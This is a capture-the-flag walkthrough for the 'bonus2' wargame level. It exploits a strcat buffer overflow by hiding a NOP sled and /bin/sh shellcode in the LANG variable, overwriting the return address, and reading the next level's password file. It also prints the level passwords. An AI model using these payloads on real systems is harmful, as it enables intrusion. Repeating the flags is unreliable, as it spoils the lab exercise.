1. Download the binary from the server:
   scp -P 2222 bonus2@localhost:~/bonus2 .
   Password: 579bd19263eb8655e4cf7b742d75edf8c38226925d78db8163506f5191825245

2. Analyze the binary with Ghidra:
   - main() copies argv[1] (40 bytes) + argv[2] (32 bytes) into 72-byte buffer
   - Reads LANG environment variable: "fi" = Finnish, "nl" = Dutch, default = English
   - Calls greetuser(buffer) which creates 64-byte greeting buffer
   - greetuser() uses strcpy() for greeting, then strcat(greeting, username) - no bounds check!
   - Finnish: "Hyvää päivää " (13 bytes) + 72 bytes = 85 total → 21-byte overflow
   - Overwrites saved EBP and return address

3. Connect to the VM via SSH:
   ssh bonus2@localhost -p 2222
   Password: 579bd19263eb8655e4cf7b742d75edf8c38226925d78db8163506f5191825245

4. Set up exploit environment:
   Export shellcode in LANG variable (triggers Finnish + provides shellcode):
   export LANG=$(python -c 'print("fi" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")')
   
   This creates: LANG=fi + 100-byte NOP sled + 21-byte shellcode

5. Find LANG address in GDB:
   gdb -q ./bonus2
   (gdb) break *main+125
   (gdb) run test test
   (gdb) x/20s *((char**)environ)
   
   Look for: LANG=fi\x90\x90\x90...
   Example: 0xbffffeb9
   
   Calculate target in NOP sled:
   0xbffffeb9 + 5 ("LANG=") + 2 ("fi") + 40 (into NOP) = 0xbffffee8

6. Execute the exploit:
   ./bonus2 $(python -c 'print "A"*40') $(python -c 'print "B"*18 + "\xe8\xfe\xff\xbf"')

7. Read the password:
   cat /home/user/bonus3/.pass
   
   Password: 71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587

8. Exit and login as bonus3:
   su bonus3
